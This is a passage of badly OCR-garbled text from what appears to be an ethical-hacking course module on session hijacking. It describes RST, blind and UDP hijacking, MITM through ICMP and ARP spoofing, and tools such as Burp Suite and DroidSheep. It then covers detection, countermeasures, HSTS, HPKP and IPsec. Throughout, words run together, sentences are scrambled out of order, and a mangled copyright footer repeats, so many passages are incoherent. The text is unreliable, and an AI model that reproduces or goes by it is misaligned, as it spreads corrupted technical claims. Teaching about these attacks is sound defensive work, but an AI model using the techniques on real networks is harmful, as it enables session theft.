destinationIP. Byusingthis source-routing technique, attackersfool the server into believing
that it is communicating with the user.
After spoofing the IP address successfully, the hijacker alters the sequence and
acknowledgment numbers.Oncethese numbersa re changed, the attackerinjectsforged
packetsinto theTCPsession beforethe clientcan respond. Thisleadsto a desynchronizedstate
becausetherethe sequenceand ACKnumbers a re not synchronized.Theoriginal packets are
lost,andthe server receives a packet
with the new ISN.Thesepackets are source routed to a
patched bytheattacker.
destinationIP addressspecified
ical andCountermensores
Mackin ©by E-Comel
Copyright
RSTHijacking
AS Thjpehng
wolves injecting looking
a authentic reset(RST) wingspoofed source
packet adress and
theacknowledgment
predicting number
believe
The vcimwould thatthesource set thereset packet,
andresettheconnection
peanate
RSTHijacking
RSThijacking a n authentic-looking
involvesinjecting reset (RST)
packet
byusing a spoofed
source IP andpredicting
address the acknowledgment
number.Thehackercan reset the
victim'sconnection if it usesan accurate acknowledgment
number.Thevictim believesthat the
source hassent the reset packet and resetsthe connection.RSThijacking
can be performed
Usingpacket-crafting toolssuchas ColasoftPacketBuilderand TCP/IPanalysistoolssuchas
‘tcpdump.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Blind and UDPHijacking
|@Anatackercan
Blind
inject
Hijacking
data Hijacking
or || before
UDP
malicious commands @ Anetworkleve sestonhijackingwhere
theaserver
into te interespted
communication n the T O?
sesion even i caabed
the source routing intended replies toi
|@ T h estacker
hasino access can
sendor forged
reiy
tose theresponse attack
the data commands but (©Theattackeruses mansinthesmiddle to
Intaceptthe servers esponcetthe cent and
sends
} |ae
Blind Hijacking
In blind hijacking,an attacker can inject maliciousdata or commands into intercepted
communicationsin a TCPsession,even if the victim disables source routing.Forthispurpose,
the attackermust correctly guess the next ISN of a computer attemptingto establisha
connection. Althoughtheattackercan sendmalicious data or a command, suchas a password
settingto allow accessfrom anotherlocationon the network, the attackercannot view the
response. To beableto view the response,an MITM attackis a muchbetteroption.
‘Sends
a request
totheserver Attacker
Intercepts
UDP Hijacking
11.2: Figure Bindhacking
process
to a clientUDP request
In networklevelsessionhijack,
datawithout the victim noticing.
beforethe server can Thus,
it
the hijacker
the attacker
ical andCountermensores
Mackin ©by E-Comel
Copyright
takescontrolofthesession.No packets
are exchanged
betweentheserver andclient,
because
theserver’s acknowledgement
sequencenumberfailsto matchthe client’s number.
server'sreplycan be easily
‘The restrictedif sniffing
is used.An MITM attacki n UDP hijacking
can minimize the taskof the attackerbecause replyfrom reaching
it can stopthe server’s the
first
clienti n the place,
nt sends UOP
request
Po response
Attacker
soilsthe
trafic
attacker
11.25:
Figure
aUDP Making session
ical andCountermensores
Mackin ©by E-Comel
Copyright
In
this
attack,the packet
changes
Amattacker
sifer
the defaultgateway the
is used
client
as an interface
between
machineandattempts
of the client's to reroute
andserver
Thepacketsbetweenthe cientand
as shown
two techniques, below: through
the
severare routed hijackers
hostusing
Forged
Intornet Control
Protocol(CMP) MessageAadrors
Rosotution
(ARP) Protocol Spoofing
MITM
Attack
Using
‘An
Forged
packet
MITM attackuses a
ICMPandARPSpoofing
snifferto interceptcommunication betweena andserver.
client
Theattackerchanges
the defaultgateway of the client’s
machine and attemptsto reroute
packets.
Thepackets
betweenthe clientand server are routed through
the hijacker’s
hostby
Usingthe following
two techniques.
=
ForgedInternet ControlMessage (ICMP)
Protocol
TheInternetControlMessage Protocol(ICMP) is an extension of IPusedto senderror
messages. An attackercan use ICMPto sendmessages to fool the clientand server. In
this technique,ICMPpackets are forgedto redirecttrafficbetweenthe clientandhost
through the hijacker’s
host. The hacker'spackets send error messages indicating
problems i n processingpackets through the originalconnection. Thisfoolsthe server
andclientinto routingthrough the hijacker’s
pathinstead.
ResolutionProtocol(ARP)
‘Address Spoofing
Hostsuse AddressResolution Protocol (ARP)tables to map local network layer
addresses(IPaddresses) to hardwareaddresses or MAC addresses. Thistechnique
fooling
involves
sendingforged
thehostbybroadcasting
ARPreplies.
ARPrequest
Theattackersendsforged
tablesof the hostthat is broadcasting
the
andchanging
ARPreplies
ARP requests.
its ARPtablesby
that update the ARP
Thisroutesthe trafficto the
attacker'shostinsteadof the legitimate
IPaddress.
In both techniques,
an attackerroutes the packets
i n transit betweenthe clientand server
their
through machine,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow
[NetworkLevel Session
01 mijacking
Session Concepts 03 Hijacking
02, Replication
Level
Hijacking
Session
04
~Session
Hijacking
Tools
05 Countermeasures
SessionHijacking
Tools
Burp
| an and
SurS ute allow atacternsec modly
SessionHijacking
Tools
Attackers ZAP,and bettercap
c an use toolssuchas BurpSuite,OWASP to hijack
a session
various tools that help
betweena client and server. Thissection discusses perform
session
hijacking.
=
BurpSuite
Source:https://portswigger.net
ical
Mackin
and ©byCountermensoresCopyright
E-Comel
Burp Suiteis an integrated
platform testingofwebapplications.
forthe security It allows
attackersto inspectandmodify
trafficbetweena browserandtargetapplication.
Suitecontainsthe following
Burp keycomponents.
© An intercepting andmodify
proxy,whichallowsthe user to inspect trafficbetween
their browserandthe targetapplication
application-aware
‘An thatcrawlscontent andfunctionality
spider
advancedwebapplication
‘An scanner that automatesthedetection
of numerous
typesof vulnerability
‘An
intruder tool for performing
powerful
customizedattacksto find and exploit
unusualvulnerabilities
tool for manipulating
A repeater andresending individualrequests
sequencer
‘A
tool for testingthe randomness
CSRFPoC Generator function,
‘The
of session tokens
which generates proof-of-conceptcross-site
requestforgery (CSRF) attacksfor a givenrequest
shownin the figure,
‘As attackersc an use thistool to capture
andlater use that cookieto reopena closedsession
of
the of
a session cookie a victim
victim.
Attackershijack
thecookies
andreopen
the
last closed
sesion of th
11.26Screenshot
Figure of furpSuite
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing sessionhijacking
are some additional tools:
+
ZAP(httpsi//www.owasp.ora)
OWASP
+
bettercap
(https://www.bettercap.org)
+
netooltoolkit (https://sourceforge.net)
WebSploit (https://sourceforge.net)
Framework
(https://pypl
sslstrip python.ora)
Module
8 1428
Page tical MakingandCountermensores
by
Copyright©
Comet
Session Hijacking
Tools for Mobile Phones CE
DroidSheep DroidSnitt FaceNitt
BZES
pRB
SessionHijackingTools for Mobile Phones
+
Droidsheep
Source:https://droidsheep.info
tool is usedfor sessionhijacking
TheDroidSheep on Androiddevicesconnectedto a
common
anduses it to accessa
observethe activities of authorizedusers on
of
wirelessnetwork.It obtainsthe session ID active
user. A DroidSheep
websiteas an authorized
websites.It
users on
user can easily
can alsohijack
the Wi-Finetwork
socialaccounts
byobtainingthe sessionID.
Figure
11.27:
Screenshot
of Droisheep
ical andCountermensores
Mackin ©by E-Comel
Copyright
Droidsniff
Source:https://github.com
DroidSniffis analysis
an Androidapp for security i n wireless
networksthat can capture
Facebook, andotheraccounts.Thistoolis usedfortestingthe security
Twitter,Linkedin,
of user accounts. It identifiesthe poor of network connections
securityproperties
without
encryption.
Figure
23.28Screenshot
ofBrian
FaceNiff
Source:http://faceniff
ponury.net
FaceNiff
cover
is an Androidapp
can hijack
that to
allowsa user sniff andintercept web-session
the WiFinetworkthat the user'smobiledeviceis connectedt o. Although
s essions onlywhen the WiFi networkdoesnot use the Extensible
profiles
FaceNiff
AuthenticationProtocol(EAP),
it workson any privatenetwork,including open, Wired
EquivalentPrivacy (WEP), Wi-Fi ProtectedAccess-pre-shared key(WPA-PSK), and
WPA2-PSK networks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow
01
Session
Concepts
mijacking 03
[NetworkLevel Session
Fgcaig
02 Application
Lavel Session
Hijacking
Countermeasures
In general, hijacking
is adangerous attackbecausethe victim is at riskof identity
theft,fraud,
andlossof sensitiveinformation.All networksusingTCP/IP are vulnerableto thedifferenttypes
of sessionhijackingattacksdiscussed earlier.However,following bestpractices mightprotect
againstsession hijackingattacks.
Thissectiondiscusses sessionhijacking
detectionmethods, sessionhijacking
detectiontools,
various countermeasures to combat session hijacking attacks, and approaches causing
vulnerability
to session hijacking
andtheir preventative (IPsec)
solutionssuchas IP Security
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionHijacking
DetectionMethods
Detection
Method
oH
ManualMethod Method
‘Automatic
Packet
Using Intrusion
Detection
sitingSoftware ‘Sytems
(IDS)
Introsion
Prevention
‘rates
(5)
SessionHijacking
DetectionMethods
Sessionhijacking
attacksare exceptionally
difficult to detect,
and users often overlookthem
unless
theattacker causessevere damage.
Thefollowing
are some symptoms ofa sessionhijacking
attack:
*
Aburstof networkactivityfor some time,whichdecreasesthe systemperformance
=
Busy
servers resulting requests by
from sent boththeclientand hijacker
Methodsto detectsession hijacking
DetectionMethod
|
‘Manual
Method ie Method
Packet
Using IntrusionDetection
Sniffing
Software Systems
(10S)
IntrusionPrevention
(IPS)
Systems
11.30:S essonhacking
Figure detectionmethods
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Manual Method
Themanualmethodinvolvesthe use of packet sniffing
softwaresuchas Wiresharkand
SteelCentralPacketAnalyzer to monitor session hijackingattacks.The packetsniffer
packets
captures in transit across the network, whichis then analyzedusingvarious
filtering
tools.
ForcedARPEntry
replacing
A forcedARPentryinvolves the MACaddressof a compromised machine in
of
the ARPcache the server with a different one i n order to restrict networktraffic to
thecompromised machine,
forcedARPentryshouldbe performed
‘A in the caseof the following:
Repeated
ARPupdates
©.
0
Framessent betweentheclientand
ACKstorms
server withdifferentMACaddresses
Method
‘Automatic
The automatic methodinvolvesthe use of an intrusion detectionsystems (IDS)and
intrusion preventionsystems(IPS) to monitor incomingnetworktraffic. If the packet
matchesany of the attacksignatures i n the internal database,
the IDSgenerates an
alert,whereasthe IPSblocksthe trafficfromentering thedatabase.
ical andCountermensores
Mackin ©by E-Comel
Copyright
againstSessionHijacking
Protecting
acre
hal
SSH treater communi
Yo
sesson roses
Implement
timeout
destroy
the verity
website wheneied
Enable 0 utes
Protecting SessionHijacking
against
Use
+
Secure
Shell
the
(SSH) communication
channel. tocreate a secure
server
only. encrypted implement defense-in-depth
Ensure that data in transit are and the
mechanism.
Usestringsor long randomnumbersas session keys.
Usedifferentusernames andpasswords for differentaccounts.
Educate employeesandminimize remoteaccess.
Implement
()
timeout to destroy
Avoid including
sessionswhenexpired
the sessionID i n theURLor querystring
Useswitches
ratherthanhubsandlimit incoming connections.
Ensureclient-sideandserver-side softwareare
protection in the active state and up to
date.
Usestrongauthentication(such
as Kerberos) virtual privatenetworks
or peer-to-peer
(VPNs).
Configure internalandexternalspoof
appropriate ruleson gateways
ical andCountermensores
Mackin ©by E-Comel
Copyright
UseIDSproducts formonitoring
or ARPwatch ARPcachepoisoning
Useencrypted
protocols
availablei n the OpenSsH
suite
Usefirewallsandbrowsersettings
to confinecookies,
Protect authentication
cookieswith SSI.
Regularly
update
platform to fix TCP/IP
patches (e.g.,
vulnerabilities predictable
packet
sequences).
UseIPsecto session information
encrypt
UseHTTPPublicKey (HPKP)
Pinning to allowuserstoauthenticate
webservers.
Enable to verify
browsers websiteauthenticity
usingnetworknotaryservers.
Implement
DNS-based
authenticationof namedentities.
Disablecompressionmechanisms
of HTTPrequests.
Use cipher-chaining
block(CBC) ciphers randompadding
incorporating up to 255 bytes,
therebymaking
theextraction ofconfidential
informationdifficultforan attacker,
Restrictthe cross-sitescripts forgery
knownas cross-siterequest (CSRF)
fromthe client
side,
Upgrade
webbrowsers
to thelatestversions
Usevulnerability
scanners suchas masscan to detect any insecure configuration
of
HTTPSsession settings
on sites.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Guidelines to Prevent SessionHijacking
Web Development
Web Development
Guidelines to Prevent SessionHijacking
‘An hijacks
attackerusually a session byexploitingthe vulnerabilitiesi n mechanisms
usedfor
sessionestablishment.
Web developers oftenignoresecurity.During the development process,
web developersshouldconsiderthe followingguidelinesto minimize/eliminate the risk of
sessionhijacking,
=
Createsessionkeys with lengthy stringsor randomnumbersso that it is difficultfor an
attackerto guessa validsession key.
Regenerate login
thesessionID aftera successful to prevent sessionfixationattacks.
thedataandsessionkeytransferred
Encrypt betweenthe user andwebservers,
Implement
theSecureSockets Layer(SSL) allthe informationi n transit via the
to encrypt
network.
Makethesessionexpireas soonas theuser logs
out.
Preventeavesdropping
withinthenetwork.
Reduce
the life spanof a session or cookie.
Userestrictive cachedirectivesfor all the webtraffic through
HTTPand HTTPS,
suchas
the“Cache-Control:
no-cache, no-store―
and“Pragma: no-cache―
HTTPheadersand/or
equivalent
METAtagson all or (atleast)
sensitive web pages.
Do not create sessions for unauthenticated
users unless
necessary.
Ensure
HTTPOnly
while
flag
Usea secure
usingcookiesforsessionIDs
to sendcookiesin HTTPS requests thembeforesending
and encrypt
across the network,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Check whetheralltherequests
receivedforthecurrent sessionoriginate
fromthe same
IP address
anduser agent.
Implement continuous deviceverificationto identify
whetherthe user whoestablished
the sessionis stil i n control.
Implement
risk-basedauthenticationat different levelsbefore grantingaccess to
sensitive information.
Performauthentication
andintegrity
verification
betweenVPNendpoints.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebUserGuidelinesto PreventSessionHijacking
Ensurethatthe webstecetiiedbythecertivngauthorises
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionHijacking
DetectionTools
salt
| “oon eto m Wireshark | intcatne
browse
the
ae
SessionHijacking
Detection Tools
Session hijacking
attacksa re difficult andi n most cases,attacksgo unnoticed,
to detect, causing
severe leakage
of confidentialdata.Toolssuchas packetsniffers,
IDSs,andsecurity
information
andevent management (SIEM) can beusedto detectsessionhijackingattacks.
=
AlientVault
USM
Source:https://www.alienvault.com
AlienVault Unified SecurityManagement (USM) offers powerfulthreat detection,
incidentresponse, andcompliancemanagement acrosscloud,on-premises, and hybrid
environments. Securityprofessionals
can use this tool for detecting
session hijacking
attemptsandperform asset discovery,
intrusion detection, automation,SIEM
security
and log management, endpoint detectionand response, threat detection,threat
intelligence,
andvulnerability
assessment.
ical andCountermensores
Mackin ©by E-Comel
Copyright
2.33k
on 2.33kK.n0*
Figure
11.1: Screenshot
ofAlentvauitUSM
Module8 1440
Page ical andountermessre
Mackin Coy recounet
=
Wireshark
Source:https://www.wireshark.org
andinteractively
Wiresharkallowsusers to capture browsethetrafficon a network.This
tool uses Winpcap Therefore,
packets.
to capture it can onlycapture packets
on the
networkssupported byWinpcap. live networktraffic from Ethernet,
It captures IEEE
802.11, Point-to-PointProtocol/High-level
DataLinkControl(PPP/HDLC), Asynchronous
TransferMode (ATM),
Bluetooth,UniversalSerialBus(USB),
TokenRing,
FrameRelay,
and FiberDistributedData Interface(FODI) professionals
networks.Security use
Wiresharkto monitor anddetectsessionhijacking
attempts.
A Nope Ager
Ei Jtewnn. +
ona" Standard
query
ofan)
4A
wp
ured
urea
une
une
co —_Sa
Shas
seart
«wD
Seart
(Ack)
hen}
eaelae
Aine
eheret
TE0:00:08
90:0;
Srey
(s80:0,400008),
00 sts 0000;00,0:680 (o8,0:60:0:00:00)
Figure11.32:
Screenshot
of Wireshark
Thefollowing
are some additionalsession hijacking
detectiontools:
=
Check Blade(https://www.checkpoint.com)
PointIPSSoftware
=
(hetps://logrhythm.com)
LogRhythm
=
SolarWinds (https://www.solarwinds.com)
Log& EventManager
=
IBM Security
NetworkIntrusion PreventionSystem
(https://www.ibm.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Approaches
Causing to SessionHijacking
Vulnerability and
their PreventativeSolutions
‘pens
or
sh (Secure
Shel)Coveyeoaypteos seton hace
Sstsecreoct ayerlor
Transport
‘TiS
sec
ayerSeay) aguas
repent
thechances
of ccs
chingbysecrin communes
ak
St
sw
ServerMessagecass kero he secity fhe
SM the
etn ae rece chances
Approaches
Causing to SessionHijacking
Vulnerability andtheir Preventative
Solutions
Implementing encryption and signing protocols preventsattackersfrom hijacking
sessions.
Belowtable lists various issues and their respectivesolutionsthat,upon implementation,
preventor impede the hijackingofa validsession.
Solution it It sendsencrypted
Notes
dataandmakes difficultfor an
‘Secure
| to
Shell(SSH) attacker sendcorrectly
or OpenSSH encrypted
session is
dataif
jacked.
SSH |
Statement
thesethe
FTP(SFTP), Applicability
2(AS2), Plementing
implementing
managed_| protocolsreduces
theseprotocols the ch
reduces chance
SaarLayer
(SS)
or
aeaaee||
SecureSockets
cae pra)
ofa succesfulhijack
F chances
i reducesthe
hijacking
Ttprevents bysecuringIP
® IPsec
communications.
AnyRemote
‘Connection
| VPNsPPTP, Implementingencrypted suchas
Virtualprivatenetwork(VEN)2 ProtocolTunneling
connections
(L2PT),
Layer
for remote
andIPsec,
session hijacking
prevents
ServerMessage
ok tewey security
SMBsigning
It improvesthe
reducesthechances
IRmitigates
of the SMBprotocol
and
of session hijacking,
theriskofARPspoofing andother
HubNetwork Switchnetwork session hijacking
attacks.
session
hacking
Table11.1:Approaches vulnerability
causing to andther preventative
solutions
Module8 1482
Page
© ical andCountermensores
Mackin Copyright
by E-Comel
to PreventSessionHijacking
Approaches
TTP
Strict
Transport
Security
(HSTS)
FTP PublicKoyPinning
(HPKP)
to PreventSessionHijacking
Approaches
‘=
HTTPStrictTransport
Security
(HSTS)
Security
HTTP Strict Transport (HSTS) policythat protectsHTTPS
is 2 web security
websitesagainstMITM attacks.TheHSTSpolicy
helpsweb servers forcewebbrowsers
to interact with themusingHTTPS. Withthe HSTS policy,
all insecure HTTPconnections
are automatically convertedinto HTTPSconnections. Thispolicy ensures that all the
communication betweena web server and web browseris encrypted and that all
that are delivered
responses froman authenticatedserver.
andreceivedoriginate
HTTPS
Request
‘Web
Server
dient
TokenBinding
Whena user logsinto a web application,
a cookiewith a session ID,calleda token,
is
generated.
Theuser utilizesthisrandom
resources.An attackerc an impersonate
and reusinga valid session ID. Tokenbinding protects
to
tokento sendrequests theserver andaccess
the user andhijack the connection bycapturing
client-servercommunication
againstsessionhijacking attacks.Theclient creates a public-private keypair forevery
connection to a remote server. Whena client connects to the server, it generates a
signature usinga privatekeyandsendsthis signature along with its public
keyto the
server. Theserver verifiesthe signature public
usingthe client’s key.Thisensures that
ical andCountermensores
Mackin ©by E-Comel
Copyright
the message was sent byan authenticclientbecause onlytheclienthasits privatekey.
Evenif an attackercapturesthe signature,it is not possible
for themto regeneratethe
signatureor reuse it foranotherconnection. Foreverynew connection,a new pair of
public
keys
andprivate are used.
browser―
‘Web > Web Server
HTTPPublic (HPKP)
KeyPinning
HTTPPublicKey Pinning (HPKP) is a trust on first use (TOFU)technique usedi n an HTTP
headerthat allowsa web client to associatea specific publickeycertificatewith a
particularserver to minimize the riskof MITM attacksbasedon fraudulentcertificates.
In TLS sessions,to verifythe authenticity of a server'spublic key,the publickeyis
enclosedi n an X.509digital certificate,whichis signed bya certification
authority (CA)
Bycompromising any CA,attackerscan perform MITM attackson various TLSsessions.
HPKP
keys
protects
server's
TLS
sessions totto
certificate
tweb
he
fromsuchattacks
heserver,
ownedbya webserver. Whenthe clientconnects
in the certificate
bydelivering clientthe list ofpublic
chainobtainedusingHPKP.
it verifiesthe
If the server sendsany
unidentifiedpublic key,theclientissues a warning messageto the user.
‘Send usingHPRP
PublicKeys
ical andCountermensores
Mackin ©by E-Comel
Copyright
to PreventMITM Attacks
Approaches
Encryption
‘WEP/WPA
\WEP
WORand
protec
the
traffic
ae
that
theiferet wirelessprotools
t hatar intended
to isnt andrecive by
Te
can ofthese
implementationprotocols thwartunwanted
PN
tothe newark
urs connecting ad MITEtacks
prevent
Theof
VPN
inthe
newark
prevents
attackers
decrypting
data
mplementaion
between
the
endpoints fam he flowing
to PreventMITM Attacks
Approaches
Man-in-the-middle(MITM) attacksare the most common attacksi n whichthe attackerscan
thetrafficbetween
intercept Thevictimmaynot realizetheeffectofthisattack,
two endpoints.
becauseit is mostly the detectionof MITM attacksis difficult,
passivein nature. Because they
can onlybe preventedusingvarious measures.Thefollowing are some approaches to prevent
MITM attacks:
‘=
WEP/WPA
Encryption
Wired Equivalent (WEP)
Privacy and WirelessProtectedAccess(WPA) are wireless
protocolsthat are intendedto protectthe trafficthat is sent andreceivedbyusersover
a wirelessnetwork.Theimplementation of theseprotocols can thwartthe attempts of
unwantedusers to connect to the network.A weak encryption mechanism enables
attackersto bruteforcecredentialsand enter the targetnetworkto perform an MITM
attack
VPN
AVPN creates a safeand encrypted tunnelover a public
networkto securelysendand
It creates a subnetbyusingkey-based
receive sensitive information. encryptionfor
secure communication between endpoints. The implementationof a VPN i n the
networkprevents fromdecrypting
attackers the dataflowing
between the endpoints.
‘Two-Factor
Authentication
Two-factorauthenticationprovidesan extra layer
of protection
becauseit serves as a
vector of authentication i n addition to a user's password. Therefore, the
implementation of two-factorauthenticationcan preventattackersfromperforming
session hijacking
and bruteforcing
to compromise a user’s
account.
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPSec
(©Pec isa
encrypting bythe
IETF
suite developed
protocol
eachIPpacket
ofa communicationsession
byauthenticating
forsecuringIPcommunications and
(©
tis deployed
networks
VPNsandforremote user
widelyto implement access through
diaLup
connection
ta private
Components
of IPsec Benefits of IPSec
Incernet
Key (KE)
Exchange
Dita authentication
origin
Protocol
‘Management
oakey
Dat ite
Ditaconieriaty (encryption)
IPSec (Cont'd)
of IPsec
‘Modes IPsecArchitecture
‘rama
mad ecuion
ny
( {5 Protea
|
“Aen―
Â¥
IPsec
Internet Protocol
Security (IPsec)
is a set of protocolsthat the Internet Engineering
TaskForce
(IETF)developed to supportthe secure exchange of packets at the IP layer.
It ensures
interoperablecryptographically
basedsecurity forIPv4and IPv6,and it supportsnetworklevel
peer authentication,
dataoriginauthentication, dataintegrity,dataconfidentiality
(encryption),
andreplay usedto implement
Itis widely
protection. VPNsandforremote user accessthrough
ical andCountermensores
Mackin ©by E-Comel
Copyright
dial-upconnection to privatenetworks.It supports transportand tunnelencryptionmodes,
althoughsending andreceiving devicesmust sharea public
key.
IPsec policies
can be assigned throughthe Group configuration
Policy of Active Directory
domains,organizational
units, and IPsec deployment at the domain,site,
policies or
organizational-unit services offeredbyIPsecincludethe following:
level.Thesecurity
Rejectionofreplayed packets
(aformof partial sequence integrity)
+
+
confidentiality
Data
(encryption)
Access control
Connectionless
integrity
Data originauthentication
Dataintegrity
+
traffie-flow
Limited confidentiality
Networklevel peer authentication
+
Replay protection
At the IP layer,
IPsecprovides services,offering
all the above-mentioned the protectionof IP
and/or
upper-layer suchasTCP,
protocols ICMP,
UDP, Protocol(BGP)
andBorderGateway
Components
of IPsec
IPsec driver: Softwarethat performs functionsrequired
protocol-level and
to encrypt
decrypt packets.
Internet KeyExchange (IKE):
An protocol
that produces
securitykeys
for IPsecandother
protocols.
AssociationandKeyManagement
Internet Security Protocol(ISAKMP):
Softwarethat
to communicate byencryptingthe data exchanged
allowstwo computers between
them.
Oakley:A protocolthat usesthe Diffie-Hellmanalgorithm to create a master keyanda
keythat is specific
to eachsession i n IPsecdatatransfer.
IPsecPolicy A service included
Agent: OSthat enforces
i n Windows IPsecpolicies
for all
the networkcommunicationsinitiatedfromthat system,
Thefollowing
are the stepsinvolvedi n the IPsecprocess.
*
Aconsumer sendsa message to a service provider.
=
Theconsumer's IPsecdriverattemptsto matchthe outgoing packet's address or the
packettypeagainst the IPfilter.
The IPsec driver notifies ISAKMPto initiate securitynegotiations
with the service
provider.
Theservice provider's
ISAKMPreceives the security
negotiation
request.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Bothprinciples
initiate a key
anda sharedsecret key.
establishing
exchange, ISAKMPSecurity
an (SA)
Association
Bothprinciples
discuss
IPsecSAsandkeys.
the securitylevel
fortheinformationexchange,
establishing
both
IPsecdrivertransferspackets
Theconsumer's to the appropriate
connection typefor
transmissionto theservice provider.
Theprovider
receives the packets
andtransfersthemto theIPsecdriver.
The provider's
IPsecuses the inboundSAand keyto checkthe digital and
signature
begin
decryption.
Theprovider's
IPsecdrivertransfers
decrypted
packets layerfor
to the OSItransport
further processing.
Modesof IPsec
Theconfiguration
of IPsecinvolvestwo differentmodes:
thetunnelmodeandtransportmode.
Thesemodesare associatedwith the functionsof two core protocols:
the Encapsulation
Payload
Security (ESP)
and AuthenticationHeader(AH). Themodelselectiondepends
on the
andimplementation
requirements of IPsec.
Transport Mode
In the transportmode (alsoESP), IPsec encrypts onlythe payload of the IP packet,
leaving the headeruntouched,It authenticates two connectedcomputers and provides
the optionof encrypting datatransfer.It is compatible
with networkaddresstranslation
(NAT); therefore,
it can beusedto
provide VPNservices for networksutilizing
NAT.
“Internet
an
~
Transportmodeencapsulation
en er
eacer
< | |(ree,
<<
uoP,
header
ste)
encrypted
ererpted >
TunnelMode
Figure
11.36:
mode
encapsulation
Transport
In thetunnelmode(also
AH),the IPsecencryptsboththe payload
andheader.Hence, in
thetunnelmodehashighersecurity thanthe transportmode.Afterreceivingthe data,
deviceperforms
the IPsec-compliant decryption.Thetunnel modelis usedto create
VPNsover the Internetfor network-to-networkcommunication (e.g,,
betweenrouters
andlink sites),
host-to-networkcommunication (e.g.,
remote user
access),
andhost-to-
ical andCountermensores
Mackin ©by E-Comel
Copyright
hostcommunication (e.g,,
privatechat). with NATandsupportsNAT
It is compatible
traversal.
In the tunnel mode, the system entire IP packets
encrypts (payload and IP header)
and
encapsulates the encrypted packets
into 2 new IP packet with a new header.In this
mode,ESPencrypts and optionally
authenticatesentire inner IP packets,whereasAH
authenticates entire inner IP packets
andselectedfieldsof outerIPheaders.Thetunnel
modeis usually usefulbetweentwo gateways or betweena hostandgateway.
Tunnel modeencapsulation
-
|
Made enter
IPsecArchitecture
IPsecoffers security services at the network layer. Thisprovidesthe freedomto selectthe
required securityprotocols as well as the algorithms usedfor services. To provide the
requested services,the corresponding cryptographic keyscan be employed, if required
Security services offered by IPsec include access control,data origin authentication,
connectionless anti-replay,
integrity, To meet theseobjectives,
and confidentiality. IPsecuses
two traffic securityprotocols,AH and ESP, as well as cryptographic
keymanagement protocols
andprocedures.
protocol
‘The
‘=
of
structure the IPsecarchitectureis asfollows.
AuthenticationHeader(AH):It offers integrityand data origin authentication,
with
optional
anti-replay
features.
Encapsulating
Security (ESP):
Payload It offersall the services offeredbyAH as well as
confidentiality.
IPsecDomain of Interpretation(DOI): It definesthe payload formats, typesof
exchange,
and namingconventions for securityinformationsuch as cryptographic
algorithms
or securitypolicies.
IPsecDOI instantiates ISAKMPfor use with IP when IP
usesISAKMPto negotiate
security
associations.
Internet Security Associationand KeyManagement Protocol(ISAKMP): It is 2 key
protocol the required
in the IPsecarchitecturethat establishes for various
security
communications over the Internet, such as government,private,and commercial
ical andCountermensores
Mackin ©by E-Comel
Copyright
communications,by combining the securityconceptsof authentication,
key
andsecurity
management, associations.
Policy:
IPsec policies
are usefuli n providing They
network security. definewhenand
howto secure data,a s well as security
methodsto use at differentlevelsin thenetwork.
can configure
‘One
site,
IPsecpolicies
organizational
unit, andso on
to meet the security
of
requirementsa system,domain,
v
se
Architecture
Wane
.
J oo
v
| An Protoct
y
ESP
Protocol
“%
Authentication
Algorithm
a
=
> KeyManagement
11.38IPsecarchitecture
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPsecAuthenticationand Confidentiality
1 sec uses
authentiation
two diferent
and
confidentiality
Provides
Pond (ESP: both
tncrypton(oni) of
IPsecAuthenticationand Confidentiality
IPsecuses two differentsecurity andconfidentiality.
services for authentication
+
AuthenticationHeader(AH): It is usefuli n providing
connectionless anddata
integrity
origin authenticationfor IP datagrams andanti-replay protectionforthe data payload
and some portionsof the IP headerof eachpacket. However,it doesnot supportdata
confidentiality(noencryption). A receiver can selectthe service to protectagainst
replays,whichis an optional service on establishing association(SA).
a security
EncapsulationSecurity
Payload (ESP): In addition to the services (dataorigin
authentication, integrity,and anti-replay
connectionless service)
providedbyAH,the
ESPprotocol offers confidentiality.Unlike AH,ESPdoes not provide integrityand
authenticationforthe entire IP packetin the transport alone,
mode.ESPcan be applied
with AH,or i n a nestedmanner. It protects
i n conjunction onlythe IP datapayload
i n the
defaultsetting.nthe tunnelmode,i t protects boththe payloadandIPheader
ical andCountermensores
Mackin ©by E-Comel
Copyright
8
Module 1452
Page tical andCountermensores
Making by Comet
Copyright©
J
SessionHijacking
PreventionTools CEH
pi
amar |
ae ome
mason ‘ae
yt
SessionHijacking PreventionTools
To prevent
session hijacking, testingof web applications
the security andthe analysisof static
codeto identify i n webapplications
vulnerabilities Identifying
are required. vulnerabilities
at an
earlystagehelpsi n implementing securitymeasures to protectagainstsession hijacking
attacks.
=
OSAST
Source:https://www.checkmarx.com
Checkmarx CxSAST is a unique source-code analysis
solutionthat providestools for
identifying,
tracking,and repairingtechnical flawsin source code,suchas
and logical
securityvulnerabilities,
compliance issues, and businesslogicproblems. CxSAST
supports open-source analysis (CxOSA), enablinglicensing and compliance
management, vulnerability
alerts,policy
enforcement,and reporting.
Thistool supports
wide rangeof OSplatforms,
‘a programming languages,andframeworks.
professionals
Security various sessionhijacking
can use thistool to prevent attackssuch
MITM attacks,
‘as session fixationattacks, andXSSattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
8
Module 1454
Page ca
acing
an
©
Cp an
Contemene
Fiddler
Source:https://www.telerik.com
Fiddleris usedfor performing
web-application t ests suchas the decryption
security of
HTTPS
traffic
is a requests
manipulation
and
web debugging
Internet.
using
decryption
technique.
of
proxy that logsall HTTP(S)
an MITM
traffic betweena computer
and the
Fiddler
professionals
Security bydebugging
can use Fiddlerto test web applications thetraffic
fromsystems
as well as manipulating
andediting
web sessions.
Figure11.41:Screenshot
ofFidler
Thefollowing
are some additionalsession hijacking preventiontools:
Nessus (https://www.tenable.com)
=
(https://www.netsparker.com)
Netsparker
=
(hetp://wapiti.sourceforge.net)
Wapiti
(https://www.exclamationsoft.com)
WebWatchBot
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
season detectionandpreventiontals
hijacking
Weconcluded withadetaleddscusson on various cuntermasures tobe employed
